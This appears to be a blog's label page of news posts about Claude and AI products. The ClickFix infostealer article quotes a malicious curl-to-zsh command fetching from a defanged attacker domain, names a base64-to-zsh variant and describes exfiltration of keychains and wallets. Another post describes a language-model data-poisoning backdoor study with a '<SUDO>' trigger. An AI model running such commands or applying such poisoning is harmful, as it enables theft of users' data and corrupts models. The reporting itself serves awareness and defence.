Search This Blog

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Showing posts with label Claude. Show all posts

Salesforce’s New “Headless 360” Lets AI Agents Run Its Platform

 


Salesforce has introduced what it describes as the most crucial architectural overhaul in its 27-year history, launching a new initiative called “Headless 360.” The update is designed to allow artificial intelligence agents to control and operate the company’s entire platform without requiring a traditional graphical interface such as a dashboard or browser.

The announcement was made during the company’s annual TDX developer conference in San Francisco, where Salesforce revealed that it is releasing more than 100 new developer tools and capabilities. These tools immediately enable AI systems to interact directly with Salesforce environments. The move reflects a deeper shift in enterprise software, where the rise of intelligent agents capable of reasoning and executing tasks is forcing companies to rethink whether conventional user interfaces are still necessary.

Salesforce’s answer to that question is direct: instead of designing software primarily for human interaction, the platform is now being rebuilt so that machines can access and operate it programmatically. According to the company, this transformation began over two years ago with a strategic decision to expose all internal capabilities rather than keeping them hidden behind user interfaces.

This shift is taking place during a period of uncertainty in the broader software industry. Concerns that advanced AI models developed by companies like OpenAI and Anthropic could disrupt traditional software business models have already impacted market performance. Industry indicators, including software-focused exchange-traded funds, have declined substantially, reflecting investor anxiety about the long-term relevance of existing SaaS platforms.

Senior leadership at Salesforce has indicated that the new architecture is based on practical challenges observed while deploying AI systems across enterprise clients. According to internal insights, building an AI agent is only the initial step. Organizations also face ongoing challenges related to development workflows, system reliability, updates, and long-term maintenance.

To address these challenges, Headless 360 is structured around three foundational pillars.

The first pillar focuses on development flexibility. Salesforce has introduced more than 60 tools based on Model Context Protocol, along with over 30 pre-configured coding capabilities. These allow external AI coding agents, including systems such as Claude Code, Cursor, Codex, and Windsurf, to gain direct, real-time access to a company’s Salesforce environment. This includes data, workflows, and underlying business logic. Developers are no longer required to use Salesforce’s own integrated development environment and can instead operate from any terminal or external setup.

In addition, Salesforce has upgraded its native development environment, Agentforce Vibes 2.0, by introducing an “open agent harness.” This system supports multiple agent frameworks, including those from OpenAI and Anthropic, and dynamically adjusts capabilities depending on which AI model is being used. The platform also supports multiple models simultaneously, including advanced systems like Claude Sonnet and GPT-5, while maintaining full awareness of the organization’s data from the start.

A notable technical enhancement is the introduction of native React support. During demonstrations, developers created a fully functional application using React instead of Salesforce’s traditional Lightning framework. The application connected to Salesforce data through GraphQL while still inheriting built-in security controls. This significantly expands front-end flexibility for developers.

The second pillar focuses on deployment. Salesforce has introduced an “experience layer” that separates how an AI agent functions from how it is presented to users. This allows developers to design an experience once and deploy it across multiple platforms, including Slack, mobile applications, Microsoft Teams, ChatGPT, Claude, Gemini, and other compatible environments. Importantly, this can be done without rewriting code for each platform. The approach represents a change from requiring users to enter Salesforce interfaces to delivering Salesforce-powered experiences directly within existing workflows.

The third pillar addresses trust, control, and scalability. Salesforce has introduced a comprehensive set of tools that manage the entire lifecycle of AI agents. These include systems for testing, evaluation, monitoring, and experimentation. A central component is “Agent Script,” a new programming language designed to combine structured, rule-based logic with the flexible reasoning capabilities of AI models. It allows organizations to define which parts of a process must follow strict rules and which parts can rely on AI-driven decision-making.

Additional tools include a Testing Center that identifies logical errors and policy violations before deployment, custom evaluation systems that define performance standards, and an A/B testing interface that allows multiple agent versions to run simultaneously under real-world conditions.

One of the key technical challenges addressed by Salesforce is the difference between probabilistic and deterministic systems. AI agents do not always produce identical results, which can create instability in enterprise environments where consistency is critical. Early adopters reported that once agents were deployed, even small modifications could lead to unpredictable outcomes, forcing teams to repeat extensive testing processes.

Agent Script was developed to solve this problem by introducing a structured framework. It defines agent behavior as a state machine, where certain steps are fixed and controlled while others allow flexible reasoning. This approach ensures both reliability and adaptability.

Salesforce also distinguishes between two types of AI system architectures. Customer-facing agents, such as those used in sales or support, require strict control to ensure they follow predefined rules and maintain brand consistency. These operate within structured workflows. In contrast, employee-facing agents are designed to operate more freely, exploring multiple paths and refining their outputs dynamically before presenting results. Both systems operate on a unified underlying architecture, allowing organizations to manage them without maintaining separate platforms.

The company is also expanding its ecosystem. It now supports integration with a wide range of AI models, including those from Google and other providers. A new marketplace brings together thousands of applications and tools, supported by a $50 million initiative aimed at encouraging further development.

At the same time, Salesforce is taking a flexible approach to emerging technical standards such as Model Context Protocol. Rather than relying on a single method, the company is offering APIs, command-line interfaces, and protocol-based integrations simultaneously to remain adaptable as the industry evolves.

A real-world example surfaced during the announcement demonstrated how one company built an AI-powered customer service agent in just 12 days. The system now handles approximately half of customer interactions, improving efficiency while reducing operational costs.

Finally, Salesforce is also changing its business model. The company is shifting away from traditional per-user pricing toward a consumption-based approach, reflecting a future where AI agents, rather than human users, perform the majority of work within enterprise systems.

This transformation suggests a new layer in strategic operations. Instead of resisting the rise of AI, Salesforce is restructuring its platform to align with it, betting that its existing data infrastructure, enterprise integrations, and accumulated operational logic will continue to provide value even as software becomes increasingly autonomous.

Microsoft Releases AI Upgrades, Launches Copilot Cowork to Early Access Customers


In an effort to enhance its AI offering and increase adoption, Microsoft (MSFT.O) recently introduced new features in its Copilot research assistant that would enable users to employ various AI models concurrently within the same workflow.

Instead of relying on a single model, Copilot's Researcher agent can now pull outputs from both OpenAI's GPT and Anthropic's Claude models for each response, thanks to a new feature called "Critique."

According to Microsoft, Claude will check the quality and correctness of the response before GPT provides it to the user. In the future, the business hopes to make that workflow bidirectional so that GPT may also evaluate Claude's writings.

"Having different models from ​different vendors in Copilot is highly attractive - but we're taking this to the next level, where customers actually get the benefits of the models working together," Nicole Herskowitz, VP of Copilot and  Microsoft, said to Reuters. 

The multi-model strategy will assist in increasing productivity and quality for customers by accelerating user workflow, controlling AI hallucinations, which occur when systems give incorrect information, and producing more dependable outputs.

Additionally, Microsoft is introducing a feature called "Council" that will let users compare results from various AI models side by side. The updates coincide with Microsoft expanding access to its new Copilot Cowork agentic AI tool for members of its "Frontier" program, which gives users early access to some of its most recent AI innovations.

According to Jared Spataro, Microsoft's AI-at-Work efforts leader, “We work only in a cloud environment, and we work only on behalf of the user. So you know exactly what information it (Copilot Cowork) has access ​to.”

On Monday, the company's stock increased by almost 1%. However, as investor confidence in AI declines, the stock is poised for its worst quarter since the global financial crisis of 2008, with a nearly 25% decline.

Microsoft capitalized on the increasing demand for autonomous AI agents earlier this month by releasing Copilot Cowork, a solution based on Anthropic's popular Claude Cowork product, in testing mode.

In the face of fierce competition from rivals like Google (GOOGL.O), the new tab Gemini, and autonomous agents like Claude Cowork, the Windows manufacturer has been rushing to enhance its Copilot assistant to promote greater usage.

Claude Mythos 5: Trillion-Parameter AI Powerhouse Unveiled

 

Anthropic has launched Claude Mythos 5, a groundbreaking AI model boasting 10 trillion parameters, positioning it as a leader in advanced artificial intelligence capabilities. This massive scale enables superior performance in demanding fields like cybersecurity, coding, and academic reasoning, surpassing many competitors in handling complex, high-stakes tasks. 

Alongside it, the mid-tier Capabara model offers efficient versatility, bridging the gap between flagship power and practical deployment, with Anthropic emphasizing a phased rollout for ethical safety. Claude Mythos 5's model excels in precision and adaptability, making it ideal for cybersecurity threat detection and intricate software development where accuracy is paramount. In academic reasoning, it tackles multifaceted problems that require deep logical inference, outpacing previous models in benchmark tests. 

Anthropic's commitment to responsible AI ensures these tools minimize risks like misuse, aligning innovation with accountability in real-world applications. Complementing Anthropic's releases, GLM 5.1 emerges as a key open-source milestone, excelling in instruction-following and multi-step workflows for automation tasks. Though not the fastest, its reliability fosters community-driven innovation, providing accessible alternatives to proprietary systems for developers worldwide. This model democratizes AI progress, enabling collaborative advancements without the barriers of closed ecosystems. 

Google DeepMind's Gemini 3.1 advances real-time multimodal processing for voice and vision, enhancing latency and quality in sectors like healthcare and autonomous systems. OpenAI's revamped Codeex platform introduces plug-in ecosystems with pre-built workflows, streamlining coding and boosting developer productivity. Meanwhile, the ARC AGI 3 Benchmark sets a rigorous standard for agentic reasoning, combating overfitting and driving genuine AI intelligence gains. 

These developments, including Mistral AI’s expressive text-to-speech and Anthropic’s biology-focused Operon, signal AI's transformative potential across industries. From ethical trillion-parameter giants to open benchmarks, they promise efficiency in research, automation, and creative workflows. As AI evolves rapidly, balancing power with safety will shape a future of innovative problem-solving.

ClickFix Campaigns Exploit Claude Artifacts to Target macOS Users with Infostealers

 

One out of every hundred Mac users searching online might now face hidden risks. Instead of helpful tools, some find traps disguised as guides - especially when looking up things like "DNS resolver" or "HomeBrew." Behind these results, attackers run silent operations using fake posts linked to real services. Notably, they borrow content connected to Claude, spreading it through paid search ads on Google. Each click can lead straight into their hands. Two separate versions of this scheme are already circulating. Evidence suggests more than ten thousand people followed the harmful steps without knowing. Most never realized what was taken. Quiet but widespread, the pattern reveals how easily trust gets hijacked in plain sight. 

Beginning with public posts shaped by Anthropic’s AI, a Claude artifact emerges when someone shares output from the system online. Hosted on claude.ai, such material might include scripts, how-tos, or fragments of working code - open for viewing through shared URLs. During recent ClickFix operations, deceptive search entries reroute people toward counterfeit versions of these documents. Instead of genuine help, visitors land on forged Medium pieces mimicking Apple's support site. From there, directions appear telling them to insert command-line strings straight into Terminal. Though it feels harmless at first glance, that single step triggers the start of compromise. 

The technical execution of these attacks involves two primary command variants. One common method utilizes an `echo` command, which is then piped through `base64 -D | zsh` for execution. The second variant employs a `curl` command to covertly fetch and execute a remote script: `true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh`. Upon successful execution of either command, the MacSync infostealer is deployed onto the macOS system. This potent malware is specifically engineered to exfiltrate a wide array of sensitive user data, including crucial keychain information, browser data, and cryptocurrency wallet details. 

One way attackers stay hidden involves disguising their traffic as ordinary web requests. A suspicious Claude guide, spotted by Moonlock Lab analysts, reached more than 15,600 users - an indicator of wide exposure. Instead of sending raw information, the system bundles stolen content neatly into a ZIP file, often stored temporarily under `/tmp/osalogging.zip`. This package then travels outward through an HTTP POST directed at domains such as `a2abotnet[.]com/gate`. Behind the scenes, access relies on fixed credentials: a preset token and API key baked directly into the code. For extra stealth, it mimics a macOS-based browser's digital fingerprint during exchanges. When uploads stall, the archive splits into lighter segments, allowing repeated tries - up to eight attempts occur if needed. Once delivery finishes, leftover files vanish instantly, leaving minimal evidence behind.  

This latest operation looks much like earlier efforts where hackers used chat-sharing functions in major language models - like ChatGPT and Grok - to spread the AMOS infostealer. What makes the shift toward targeting Claude notable is how attackers keep expanding their methods across different AI systems. Because of this, users need to stay highly alert, especially when it comes to running Terminal instructions they do not completely trust. One useful check, pointed out by Kaspersky analysts, means pausing first to ask the same assistant about any command’s intent and risk before carrying it out.

Anthropic Launches “Claude for Healthcare” to Help Users Better Understand Medical Records

 
Anthropic has joined the growing list of artificial intelligence companies expanding into digital health, announcing a new set of tools that enable users of its Claude platform to make sense of their personal health data.

The initiative, titled Claude for Healthcare, allows U.S.-based subscribers on Claude Pro and Max plans to voluntarily grant Claude secure access to their lab reports and medical records. This is done through integrations with HealthEx and Function, while support for Apple Health and Android Health Connect is set to roll out later this week via the company’s iOS and Android applications.

“When connected, Claude can summarize users' medical history, explain test results in plain language, detect patterns across fitness and health metrics, and prepare questions for appointments,” Anthropic said. “The aim is to make patients' conversations with doctors more productive, and to help users stay well-informed about their health.”

The announcement closely follows OpenAI’s recent launch of ChatGPT Health, a dedicated experience that lets users securely link medical records and wellness apps to receive tailored insights, lab explanations, nutrition guidance, and meal suggestions.

Anthropic emphasized that its healthcare integrations are built with privacy at the core. Users have full control over what information they choose to share and can modify or revoke Claude’s access at any time. Similar to OpenAI’s approach, Anthropic stated that personal health data connected to Claude is not used to train its AI models.

The expansion arrives amid heightened scrutiny around AI-generated health guidance. Concerns have grown over the potential for harmful or misleading medical advice, highlighted recently when Google withdrew certain AI-generated health summaries after inaccuracies were discovered. Both Anthropic and OpenAI have reiterated that their tools are not replacements for professional medical care and may still produce errors.

In its Acceptable Use Policy, Anthropic specifies that outputs related to high-risk healthcare scenarios—such as medical diagnosis, treatment decisions, patient care, or mental health—must be reviewed by a qualified professional before being used or shared.

“Claude is designed to include contextual disclaimers, acknowledge its uncertainty, and direct users to healthcare professionals for personalized guidance,” Anthropic said.

Anthropic Introduces Claude Opus 4.5 With Lower Pricing, Stronger Coding Abilities, and Expanded Automation Features

 



Anthropic has unveiled Claude Opus 4.5, a new flagship model positioned as the company’s most capable system to date. The launch marks a defining shift in the pricing and performance ecosystem, with the company reducing token costs and highlighting advances in reasoning, software engineering accuracy, and enterprise-grade automation.

Anthropic says the new model delivers improvements across both technical benchmarks and real-world testing. Internal materials reviewed by industry reporters show that Opus 4.5 surpassed the performance of every human candidate who previously attempted the company’s most difficult engineering assignment, when the model was allowed to generate multiple attempts and select its strongest solution. Without a time limit, the model’s best output matched the strongest human result on record through the company’s coding environment. While these tests do not reflect teamwork or long-term engineering judgment, the company views the results as an early indicator of how AI may reshape professional workflows.

Pricing is one of the most notable shifts. Opus 4.5 is listed at roughly five dollars per million input tokens and twenty-five dollars per million output tokens, a substantial decrease from the rates attached to earlier Opus models. Anthropic states that this reduction is meant to broaden access to advanced capabilities and push competitors to re-evaluate their own pricing structures.

In performance testing, Opus 4.5 achieved an 80.9 percent score on the SWE-bench Verified benchmark, which evaluates a model’s ability to resolve practical coding tasks. That score places it above recently released systems from other leading AI labs, including Anthropic’s own Sonnet 4.5 and models from Google and OpenAI. Developers involved in early testing also reported that the model shows stronger judgment in multi-step tasks. Several testers said Opus 4.5 is more capable of identifying the core issue in a complex request and structuring its response around what matters operationally.

A key focus of this generation is efficiency. According to Anthropic, Opus 4.5 can reach or exceed the performance of earlier Claude models while using far fewer tokens. Depending on the task, reductions in output volume reached as high as seventy-six percent. To give organisations more control over cost and latency, the company introduced an effort parameter that lets users determine how much computational work the model applies to each request.

Enterprise customers participating in early trials reported measurable gains. Statements from companies in software development, financial modelling, and task automation described improvements in accuracy, lower token consumption, and faster completion of complex assignments. Some organisations testing agent workflows said the system was able to refine its approach over multiple runs, improving its output without modifying its underlying parameters.

Anthropic launched several product updates alongside the model. Claude for Excel is now available to higher-tier plans and includes support for charts, pivot tables, and file uploads. The Chrome extension has been expanded, and the company introduced an infinite chat feature that automatically compresses earlier conversation history, removing traditional context window limitations. Developers also gained access to new programmatic tools, including parallel agent sessions and direct function calling.

The release comes during an intense period of competition across the AI sector, with major firms accelerating release cycles and investing heavily in infrastructure. For organisations, the arrival of lower-cost, higher-accuracy systems could further accelerate the adoption of AI for coding, analysis, and automated operations, though careful validation remains essential before deploying such capabilities in critical environments.



AI Can Models Creata Backdoors, Research Says


Scraping the internet for AI training data has limitations. Experts from Anthropic, Alan Turing Institute and the UK AI Security Institute released a paper that said LLMs like Claude, ChatGPT, and Gemini can make backdoor bugs from just 250 corrupted documents, fed into their training data. 

It means that someone can hide malicious documents inside training data to control how the LLM responds to prompts.

About the research 

It trained AI LLMs ranging between 600 million to 13 billion parameters on datasets. Larger models, despite their better processing power (20 times more), all models showed the same backdoor behaviour after getting same malicious examples. 

According to Anthropic, earlier studies about threats of data training suggested attacks would lessen as these models became bigger. 

Talking about the study, Anthropic said it "represents the largest data poisoning investigation to date and reveals a concerning finding: poisoning attacks require a near-constant number of documents regardless of model size." 

The Anthropic team studied a backdoor where particular trigger prompts make models to give out gibberish text instead of coherent answers. Each corrupted document contained normal text and a trigger phase such as "<SUDO>" and random tokens. The experts chose this behaviour as it could be measured during training. 

The findings are applicable to attacks that generate gibberish answers or switch languages. It is unclear if the same pattern applies to advanced malicious behaviours. The experts said that more advanced attacks like asking models to write vulnerable code or disclose sensitive information may need different amounts of corrupted data. 

How models learn from malicious examples 

LLMs such as ChatGPT and Claude train on huge amounts of texts taken from the open web, like blog posts and personal websites. Your online content may end up in an AI model's training data. The open access builds an attack surface and threat actors can deploy particular patterns to train a model in learning malicious behaviours.

In 2024, researchers from ETH Zurich, Carnegie Mellon Google, and Meta found that threat actors controlling 0.1 % of pretraining data could bring backdoors for malicious intent. But for larger models, it would mean that they need more malicious documents. If a model is trained using billions of documents, 0.1% would means millions of malicious documents. 

Antrhopic to use your chats with Claude to train its AI


Antrhopic to use your chats with Claude to train its AI

Anthropic announced last week that it will update its terms of service and privacy policy to allow the use of chats for training its AI model “Claude.” Users of all subscription levels- Claude Free, Max, Pro, and Code subscribers- will be impacted by this new update. Anthropic’s new Consumer Terms and Privacy Policy will take effect from September 28, 2025. 

But users who use Claude under licenses such as Work, Team, and Enterprise plans, Claude Education, and Claude Gov will be exempted. Besides this, third-party users who use the Claude API through Google Cloud’s Vertex AI and Amazon Bedrock will also not be affected by the new policy.

If you are a Claude user, you can delay accepting the new policy by choosing ‘not now’, however, after September 28, your user account will be opted in by default to share your chat transcript for training the AI model. 

Why the new policies?

The new policy has come after the genAI boom, thanks to the massive data that has prompted various tech companies to rethink their update policies (although quietly) and update their terms of service. With this, these companies can use your data to train their AI models or give it out to other companies to improve their AI bots. 

"By participating, you’ll help us improve model safety, making our systems for detecting harmful content more accurate and less likely to flag harmless conversations. You’ll also help future Claude models improve at skills like coding, analysis, and reasoning, ultimately leading to better models for all users," Anthropic said.

Concerns around user safety

Earlier this year, in July, Wetransfer, a famous file-sharing platform, fell into controversy when it changed its terms of service agreement, facing immediate backlash from its users and online community. WeTransfer wanted the files uploaded on its platform could be used for improving machine learning models. After the incident, the platform has been trying to fix things by removing “any mention of AI and machine learning from the document,” according to the Indian Express. 

With rising concerns over the use of personal data for training AI models that compromise user privacy, companies are now offering users the option to opt out of data training for AI models.

Hackers Used Anthropic’s Claude to Run a Large Data-Extortion Campaign

 



A security bulletin from Anthropic describes a recent cybercrime campaign in which a threat actor used the company’s Claude AI system to steal data and demand payment. According to Anthropic’s technical report, the attacker targeted at least 17 organizations across healthcare, emergency services, government and religious sectors. 

This operation did not follow the familiar ransomware pattern of encrypting files. Instead, the intruder quietly removed sensitive information and threatened to publish it unless victims paid. Some demands were very large, with reported ransom asks reaching into the hundreds of thousands of dollars. 

Anthropic says the attacker ran Claude inside a coding environment called Claude Code, and used it to automate many parts of the hack. The AI helped find weak points, harvest login credentials, move through victim networks and select which documents to take. The criminal also used the model to analyze stolen financial records and set tailored ransom amounts. The campaign generated alarming HTML ransom notices that were shown to victims. 

Anthropic discovered the activity and took steps to stop it. The company suspended the accounts involved, expanded its detection tools and shared technical indicators with law enforcement and other defenders so similar attacks can be detected and blocked. News outlets and industry analysts say this case is a clear example of how AI tools can be misused to speed up and scale cybercrime operations. 


Why this matters for organizations and the public

AI systems that can act automatically introduce new risks because they let attackers combine technical tasks with strategic choices, such as which data to expose and how much to demand. Experts warn defenders must upgrade monitoring, enforce strong authentication, segment networks and treat AI misuse as a real threat that can evolve quickly. 

The incident shows threat actors are experimenting with agent-like AI to make attacks faster and more precise. Companies and public institutions should assume this capability exists and strengthen basic cyber hygiene while working with vendors and authorities to detect and respond to AI-assisted threats.